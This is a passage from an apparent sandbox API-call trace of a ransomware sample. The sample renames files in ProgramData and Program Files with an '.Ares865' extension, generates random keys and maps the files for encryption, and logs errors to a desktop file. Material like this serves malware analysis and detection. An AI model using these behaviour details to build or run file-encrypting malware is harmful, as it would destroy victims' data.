ftLastAccessTime.dwLowDateTime=0x4e1e72ec, ftLastAccessTime.dwHighDateTime=0x1cb8927, ftLastWriteTime.dwLowDateTime=0xbddddec0, ftLastWriteTime.dwHighDateTime=0x1d4d596, nFileSizeHigh=0x0, nFileSizeLow=0x8, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="RacMetaData.dat", cAlternateFileName="RACMET~1.DAT")) returned 1 [0054.113] wsprintfW (in: param_1=0x2e2d5f8, param_2="%s.%s" | out: param_1="C:\\ProgramData\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\RAC\\PublishedData\\RacWmiDatabase.sdf.Ares865") returned 239 [0054.113] MoveFileExW (lpExistingFileName="C:\\ProgramData\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\RAC\\PublishedData\\RacWmiDatabase.sdf" (normalized: "c:\\programdata\\application data\\application data\\application data\\application data\\application data\\application data\\application data\\application data\\application data\\application data\\microsoft\\rac\\publisheddata\\racwmidatabase.sdf"), lpNewFileName="C:\\ProgramData\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\RAC\\PublishedData\\RacWmiDatabase.sdf.Ares865" (normalized: "c:\\programdata\\application data\\application data\\application data\\application data\\application data\\application data\\application data\\application data\\application data\\application data\\microsoft\\rac\\publisheddata\\racwmidatabase.sdf.ares865"), dwFlags=0x1) returned 0 [0054.113] GetLastError () returned 0x20 [0054.113] wsprintfA (in: param_1=0x2e2dc38, param_2="[ERROR] %S MoveFileEx error %i\r\n" | out: param_1="[ERROR] C:\\ProgramData\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\RAC\\PublishedData\\RacWmiDatabase.sdf MoveFileEx error 32\r\n") returned 261 [0054.113] lstrlenA (lpString="[ERROR] C:\\ProgramData\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\RAC\\PublishedData\\RacWmiDatabase.sdf MoveFileEx error 32\r\n") returned 261 [0054.113] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ids.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\ids.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x12c [0054.113] SetFilePointer (in: hFile=0x12c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0x2b6a [0054.113] WriteFile (in: hFile=0x12c, lpBuffer=0x2e2dc38*, nNumberOfBytesToWrite=0x105, lpNumberOfBytesWritten=0x2e2d5d4, lpOverlapped=0x0 | out: lpBuffer=0x2e2dc38*, lpNumberOfBytesWritten=0x2e2d5d4*=0x105, lpOverlapped=0x0) returned 1 [0054.113] CloseHandle (hObject=0x12c) returned 1 [0054.114] UnmapViewOfFile (lpBaseAddress=0x0) returned 0 [0054.114] CloseHandle (hObject=0x0) returned 0 [0054.114] CloseHandle (hObject=0x0) returned 0 [0054.114] FindNextFileW (in: hFindFile=0x2cd068, lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xece09220, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0x36e8f0a0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x36eb5200, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x25000, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="RacWmiDatabase.sdf", cAlternateFileName="RACWMI~1.SDF")) returned 0 [0054.114] FindClose (in: hFindFile=0x2cd068 | out: hFindFile=0x2cd068) returned 1 [0054.114] RtlInterlockedPopEntrySList (in: ListHead=0x2e77d0 | out: ListHead=0x2e77d0) returned 0x2d2508 [0054.137] wsprintfW (in: param_1=0x2e2d5f8, param_2="%s.%s" | out: param_1="C:\\ProgramData\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\RAC\\StateData\\RacDatabase.sdf.Ares865") returned 249 [0054.137] MoveFileExW (lpExistingFileName="C:\\ProgramData\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\RAC\\StateData\\RacDatabase.sdf" (normalized: "c:\\programdata\\application data\\application data\\application data\\application data\\application data\\application data\\application data\\application data\\application data\\application data\\application data\\microsoft\\rac\\statedata\\racdatabase.sdf"), lpNewFileName="C:\\ProgramData\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\RAC\\StateData\\RacDatabase.sdf.Ares865" (normalized: "c:\\programdata\\application data\\application data\\application data\\application data\\application data\\application data\\application data\\application data\\application data\\application data\\application data\\microsoft\\rac\\statedata\\racdatabase.sdf.ares865"), dwFlags=0x1) returned 0 [0054.138] GetLastError () returned 0x20 [0054.138] wsprintfA (in: param_1=0x2e2dc38, param_2="[ERROR] %S MoveFileEx error %i\r\n" | out: param_1="[ERROR] C:\\ProgramData\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\RAC\\StateData\\RacDatabase.sdf MoveFileEx error 32\r\n") returned 271 [0054.138] lstrlenA (lpString="[ERROR] C:\\ProgramData\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\RAC\\StateData\\RacDatabase.sdf MoveFileEx error 32\r\n") returned 271 [0054.138] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ids.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\ids.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x12c [0054.138] SetFilePointer (in: hFile=0x12c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0x2c6f [0054.138] WriteFile (in: hFile=0x12c, lpBuffer=0x2e2dc38*, nNumberOfBytesToWrite=0x10f, lpNumberOfBytesWritten=0x2e2d5d4, lpOverlapped=0x0 | out: lpBuffer=0x2e2dc38*, lpNumberOfBytesWritten=0x2e2d5d4*=0x10f, lpOverlapped=0x0) returned 1 [0054.138] CloseHandle (hObject=0x12c) returned 1 [0054.139] UnmapViewOfFile (lpBaseAddress=0x0) returned 0 [0054.139] CloseHandle (hObject=0x0) returned 0 [0054.139] CloseHandle (hObject=0x0) returned 0 [0054.139] FindNextFileW (in: hFindFile=0x2cd068, lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x4e1e72ec, ftCreationTime.dwHighDateTime=0x1cb8927, ftLastAccessTime.dwLowDateTime=0x4e1e72ec, ftLastAccessTime.dwHighDateTime=0x1cb8927, ftLastWriteTime.dwLowDateTime=0xbddddec0, ftLastWriteTime.dwHighDateTime=0x1d4d596, nFileSizeHigh=0x0, nFileSizeLow=0x8, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="RacMetaData.dat", cAlternateFileName="RACMET~1.DAT")) returned 1 [0054.139] wsprintfW (in: param_1=0x2e2d5f8, param_2="%s.%s" | out: param_1="C:\\ProgramData\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\RAC\\PublishedData\\RacWmiDatabase.sdf.Ares865") returned 256 [0054.139] MoveFileExW (lpExistingFileName="C:\\ProgramData\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\RAC\\PublishedData\\RacWmiDatabase.sdf" (normalized: "c:\\programdata\\application data\\application data\\application data\\application data\\application data\\application data\\application data\\application data\\application data\\application data\\application data\\microsoft\\rac\\publisheddata\\racwmidatabase.sdf"), lpNewFileName="C:\\ProgramData\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\RAC\\PublishedData\\RacWmiDatabase.sdf.Ares865" (normalized: "c:\\programdata\\application data\\application data\\application data\\application data\\application data\\application data\\application data\\application data\\application data\\application data\\application data\\microsoft\\rac\\publisheddata\\racwmidatabase.sdf.ares865"), dwFlags=0x1) returned 0 [0054.140] GetLastError () returned 0x20 [0054.140] wsprintfA (in: param_1=0x2e2dc38, param_2="[ERROR] %S MoveFileEx error %i\r\n" | out: param_1="[ERROR] C:\\ProgramData\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\RAC\\PublishedData\\RacWmiDatabase.sdf MoveFileEx error 32\r\n") returned 278 [0054.140] lstrlenA (lpString="[ERROR] C:\\ProgramData\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\RAC\\PublishedData\\RacWmiDatabase.sdf MoveFileEx error 32\r\n") returned 278 [0054.140] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ids.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\ids.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x12c [0054.140] SetFilePointer (in: hFile=0x12c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0x2d7e [0054.140] WriteFile (in: hFile=0x12c, lpBuffer=0x2e2dc38*, nNumberOfBytesToWrite=0x116, lpNumberOfBytesWritten=0x2e2d5d4, lpOverlapped=0x0 | out: lpBuffer=0x2e2dc38*, lpNumberOfBytesWritten=0x2e2d5d4*=0x116, lpOverlapped=0x0) returned 1 [0054.140] CloseHandle (hObject=0x12c) returned 1 [0054.140] UnmapViewOfFile (lpBaseAddress=0x0) returned 0 [0054.141] CloseHandle (hObject=0x0) returned 0 [0054.141] CloseHandle (hObject=0x0) returned 0 [0054.141] FindNextFileW (in: hFindFile=0x2cd068, lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xece09220, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0x36e8f0a0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x36eb5200, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x25000, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="RacWmiDatabase.sdf", cAlternateFileName="RACWMI~1.SDF")) returned 0 [0054.141] FindClose (in: hFindFile=0x2cd068 | out: hFindFile=0x2cd068) returned 1 [0054.141] RtlInterlockedPopEntrySList (in: ListHead=0x2e77d0 | out: ListHead=0x2e77d0) returned 0x2d2528 [0054.165] wsprintfA (in: param_1=0x2e2f028, param_2="[ERROR] %S FindFirstFile error %i\r\n" | out: param_1="[ERROR] C:\\ProgramData\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Adobe\\* FindFirstFile error 3\r\n") returned 292 [0054.165] lstrlenA (lpString="[ERROR] C:\\ProgramData\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Adobe\\* FindFirstFile error 3\r\n") returned 292 [0054.165] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ids.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\ids.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x15c [0054.165] SetFilePointer (in: hFile=0x15c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0x2e94 [0054.165] WriteFile (in: hFile=0x15c, lpBuffer=0x2e2f028*, nNumberOfBytesToWrite=0x124, lpNumberOfBytesWritten=0x2e2e514, lpOverlapped=0x0 | out: lpBuffer=0x2e2f028*, lpNumberOfBytesWritten=0x2e2e514*=0x124, lpOverlapped=0x0) returned 1 [0054.165] CloseHandle (hObject=0x15c) returned 1 [0054.166] RtlInterlockedPopEntrySList (in: ListHead=0x2e77d0 | out: ListHead=0x2e77d0) returned 0x2d2248 [0054.185] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0054.185] FindFirstFileW (in: lpFileName="C:\\Program Files (x86)\\*", lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd8ab1dc, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x51ccbaa0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x51ccbaa0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccee8 [0054.243] wsprintfW (in: param_1=0x2e2d5f8, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\en-US\\gadget.xml.Ares865") returned 86 [0054.244] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\en-US\\gadget.xml" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\weather.gadget\\en-us\\gadget.xml"), lpNewFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\en-US\\gadget.xml.Ares865" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\weather.gadget\\en-us\\gadget.xml.ares865"), dwFlags=0x1) returned 1 [0054.247] CreateFileW (lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\en-US\\gadget.xml.Ares865" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\weather.gadget\\en-us\\gadget.xml.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x15c [0054.247] GetFileSizeEx (in: hFile=0x15c, lpFileSize=0x2e2e4f0 | out: lpFileSize=0x2e2e4f0*=1990) returned 1 [0054.247] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x200300) returned 0x3630020 [0054.247] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d5f78 [0054.247] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2f0270 [0054.247] CryptAcquireContextW (in: phProv=0x2e2d2b4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2e2d2b4*=0x2f0160) returned 1 [0054.249] CryptGenRandom (in: hProv=0x2f0160, dwLen=0x80, pbBuffer=0x2e2d2c8 | out: pbBuffer=0x2e2d2c8) returned 1 [0054.249] CryptReleaseContext (hProv=0x2f0160, dwFlags=0x0) returned 1 [0054.249] CreateFileMappingW (hFile=0x15c, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0xad0, lpName=0x0) returned 0x120 [0054.252] MapViewOfFile (hFileMappingObject=0x120, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0xad0) returned 0x190000 [0054.253] CryptAcquireContextW (in: phProv=0x2e2d264, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2e2d264*=0x2f0160) returned 1 [0054.254] CryptGenRandom (in: hProv=0x2f0160, dwLen=0x80, pbBuffer=0x2e2d278 | out: pbBuffer=0x2e2d278) returned 1 [0054.254] CryptReleaseContext (hProv=0x2f0160, dwFlags=0x0) returned 1 [0054.254] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d36d8 [0054.287] wsprintfW (in: param_1=0x2e2d5f8, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\SlideShow.Gadget\\en-US\\gadget.xml.Ares865") returned 88 [0054.287] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\SlideShow.Gadget\\en-US\\gadget.xml" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\slideshow.gadget\\en-us\\gadget.xml"), lpNewFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\SlideShow.Gadget\\en-US\\gadget.xml.Ares865" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\slideshow.gadget\\en-us\\gadget.xml.ares865"), dwFlags=0x1) returned 1 [0054.290] CreateFileW (lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\SlideShow.Gadget\\en-US\\gadget.xml.Ares865" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\slideshow.gadget\\en-us\\gadget.xml.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x12c [0054.290] GetFileSizeEx (in: hFile=0x12c, lpFileSize=0x2e2e4f0 | out: lpFileSize=0x2e2e4f0*=989) returned 1 [0054.290] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x200300) returned 0x3630020 [0054.290] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d5ee0 [0054.290] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2f02f8 [0054.290] CryptAcquireContextW (in: phProv=0x2e2d2b4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2e2d2b4*=0x2f0270) returned 1 [0054.291] CryptGenRandom (in: hProv=0x2f0270, dwLen=0x80, pbBuffer=0x2e2d2c8 | out: pbBuffer=0x2e2d2c8) returned 1 [0054.291] CryptReleaseContext (hProv=0x2f0270, dwFlags=0x0) returned 1 [0054.291] CreateFileMappingW (hFile=0x12c, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x6e0, lpName=0x0) returned 0x120 [0054.293] MapViewOfFile (hFileMappingObject=0x120, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x6e0) returned 0x190000 [0054.294] CryptAcquireContextW (in: phProv=0x2e2d264, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2e2d264*=0x2f0270) returned 1 [0054.294] CryptGenRandom (in: hProv=0x2f0270, dwLen=0x80, pbBuffer=0x2e2d278 | out: pbBuffer=0x2e2d278) returned 1 [0054.294] CryptReleaseContext (hProv=0x2f0270, dwFlags=0x0) returned 1 [0054.294] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d5f58 [0054.316] wsprintfW (in: param_1=0x2e2d5f8, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\RSSFeeds.Gadget\\en-US\\gadget.xml.Ares865") returned 87 [0054.316] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\RSSFeeds.Gadget\\en-US\\gadget.xml" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\rssfeeds.gadget\\en-us\\gadget.xml"), lpNewFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\RSSFeeds.Gadget\\en-US\\gadget.xml.Ares865" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\rssfeeds.gadget\\en-us\\gadget.xml.ares865"), dwFlags=0x1) returned 1 [0054.317] CreateFileW (lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\RSSFeeds.Gadget\\en-US\\gadget.xml.Ares865" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\rssfeeds.gadget\\en-us\\gadget.xml.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x15c [0054.318] GetFileSizeEx (in: hFile=0x15c, lpFileSize=0x2e2e4f0 | out: lpFileSize=0x2e2e4f0*=1005) returned 1 [0054.318] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x200300) returned 0x3630020 [0054.318] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d5ee0 [0054.318] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2f00d8 [0054.318] CryptAcquireContextW (in: phProv=0x2e2d2b4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2e2d2b4*=0x2f02f8) returned 1 [0054.319] CryptGenRandom (in: hProv=0x2f02f8, dwLen=0x80, pbBuffer=0x2e2d2c8 | out: pbBuffer=0x2e2d2c8) returned 1 [0054.319] CryptReleaseContext (hProv=0x2f02f8, dwFlags=0x0) returned 1 [0054.319] CreateFileMappingW (hFile=0x15c, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x6f0, lpName=0x0) returned 0x120 [0054.321] MapViewOfFile (hFileMappingObject=0x120, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x6f0) returned 0x190000 [0054.321] CryptAcquireContextW (in: phProv=0x2e2d264, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2e2d264*=0x2f02f8) returned 1 [0054.322] CryptGenRandom (in: hProv=0x2f02f8, dwLen=0x80, pbBuffer=0x2e2d278 | out: pbBuffer=0x2e2d278) returned 1 [0054.322] CryptReleaseContext (hProv=0x2f02f8, dwFlags=0x0) returned 1 [0054.322] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d5f58 [0054.357] wsprintfW (in: param_1=0x2e2d5f8, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget\\en-US\\gadget.xml.Ares865") returned 92 [0054.357] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget\\en-US\\gadget.xml" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\picturepuzzle.gadget\\en-us\\gadget.xml"), lpNewFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget\\en-US\\gadget.xml.Ares865" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\picturepuzzle.gadget\\en-us\\gadget.xml.ares865"), dwFlags=0x1) returned 1 [0054.358] CreateFileW (lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget\\en-US\\gadget.xml.Ares865" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\picturepuzzle.gadget\\en-us\\gadget.xml.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x12c [0054.358] GetFileSizeEx (in: hFile=0x12c, lpFileSize=0x2e2e4f0 | out: lpFileSize=0x2e2e4f0*=1010) returned 1 [0054.358] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x200300) returned 0x3630020 [0054.358] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d5f88 [0054.358] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2f00d8 [0054.358] CryptAcquireContextW (in: phProv=0x2e2d2b4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2e2d2b4*=0x2f02f8) returned 1 [0054.359] CryptGenRandom (in: hProv=0x2f02f8, dwLen=0x80, pbBuffer=0x2e2d2c8 | out: pbBuffer=0x2e2d2c8) returned 1 [0054.359] CryptReleaseContext (hProv=0x2f02f8, dwFlags=0x0) returned 1 [0054.359] CreateFileMappingW (hFile=0x12c, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x700, lpName=0x0) returned 0x120 [0054.361] MapViewOfFile (hFileMappingObject=0x120, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x700) returned 0x190000 [0054.362] CryptAcquireContextW (in: phProv=0x2e2d264, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2e2d264*=0x2f02f8) returned 1 [0054.363] CryptGenRandom (in: hProv=0x2f02f8, dwLen=0x80, pbBuffer=0x2e2d278 | out: pbBuffer=0x2e2d278) returned 1 [0054.363] CryptReleaseContext (hProv=0x2f02f8, dwFlags=0x0) returned 1 [0054.363] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d36d8 [0054.385] wsprintfW (in: param_1=0x2e2d5f8, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Currency.Gadget\\en-US\\gadget.xml.Ares865") returned 87 [0054.385] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Currency.Gadget\\en-US\\gadget.xml" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\currency.gadget\\en-us\\gadget.xml"), lpNewFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Currency.Gadget\\en-US\\gadget.xml.Ares865" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\currency.gadget\\en-us\\gadget.xml.ares865"), dwFlags=0x1) returned 1 [0054.386] CreateFileW (lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Currency.Gadget\\en-US\\gadget.xml.Ares865" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\currency.gadget\\en-us\\gadget.xml.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x15c [0054.386] GetFileSizeEx (in: hFile=0x15c, lpFileSize=0x2e2e4f0 | out: lpFileSize=0x2e2e4f0*=1958) returned 1 [0054.386] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x200300) returned 0x3630020 [0054.386] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d5ee0 [0054.387] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2f0380 [0054.387] CryptAcquireContextW (in: phProv=0x2e2d2b4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2e2d2b4*=0x2f00d8) returned 1 [0054.387] CryptGenRandom (in: hProv=0x2f00d8, dwLen=0x80, pbBuffer=0x2e2d2c8 | out: pbBuffer=0x2e2d2c8) returned 1 [0054.387] CryptReleaseContext (hProv=0x2f00d8, dwFlags=0x0) returned 1 [0054.387] CreateFileMappingW (hFile=0x15c, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0xab0, lpName=0x0) returned 0x120 [0054.389] MapViewOfFile (hFileMappingObject=0x120, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0xab0) returned 0x190000 [0054.390] CryptAcquireContextW (in: phProv=0x2e2d264, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2e2d264*=0x2f00d8) returned 1 [0054.391] CryptGenRandom (in: hProv=0x2f00d8, dwLen=0x80, 